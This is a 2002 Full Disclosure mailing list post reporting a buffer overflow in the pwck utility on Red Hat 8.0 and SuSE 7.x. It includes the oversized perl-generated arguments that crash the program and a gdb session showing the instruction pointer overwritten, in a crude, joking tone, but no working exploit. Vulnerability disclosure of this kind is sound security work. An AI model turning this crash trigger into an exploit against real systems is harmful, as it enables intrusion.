Full Disclosure mailing list archives

Overflow in "pwck" on Redhat 8.x and Suse


From: Day Jay <d4yj4y () yahoo com>
Date: Wed, 20 Nov 2002 23:24:59 -0800 (PST)

d4y-j4y from Chung's Donut Shop has found a problem
with "pwck" on Redhat 8.0 and Suse 7.x -- probably an
issue with later versions as well. 

Per the documentation:

pwck:  verifies  the integrity of the system
authentication information.   All  entries   in   the 
 /etc/passwd   and /etc/shadow  are  checked  to  see 
that the entry has the proper format and valid data in
each field.  The  user  is prompted  to  delete
entries that are improperly formatted or which have
other incorrectable errors.

With that in mind, the program is insecure. It's not
setuid root, but could have other implications but I
don't know what.

[root@yourmom]# /usr/sbin/pwck `perl -e 'print 
"Chungs_Donut_Shop"  x 135'`
Segmentation fault
[root@yourmom]# interseting
sh: interesting: command not found
[root@yourmom]# gdb /usr/sbin/pwck
GNU gdb 20010316
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General
Public License, and you are welcome to change it
and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show
warranty" for details.
This GDB was configured as "i386-suse-linux"...(no
debugging symbols found)...
(gdb) set args `perl -e 'print  "Z"  x 6999'`
(gdb) run
Starting program: /usr/sbin/pwck `perl -e 'print  "Z" 
x 6999'`
(no debugging symbols found)...(no debugging symbols
found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x5a5a5a5a in ?? ()
(gdb) info reg eip
eip            0x5a5a5a5a       0x5a5a5a5a
(gdb) whoa we overwrote the eip
Undefined command: "whoa".  Try "help".
(gdb) quit

So we have overwritten the EIP with ZZZZZZZZZZZZs
It's sleepy.

Anyway, to lazy to try to write another non setuid
root exploit. So, there you go. I also haven't checked
out the source because I'm too lazy and I'm not good
at reading or really writing code. I'm also too lazy
to find the exact buffer size so fuck you.





__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus – Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: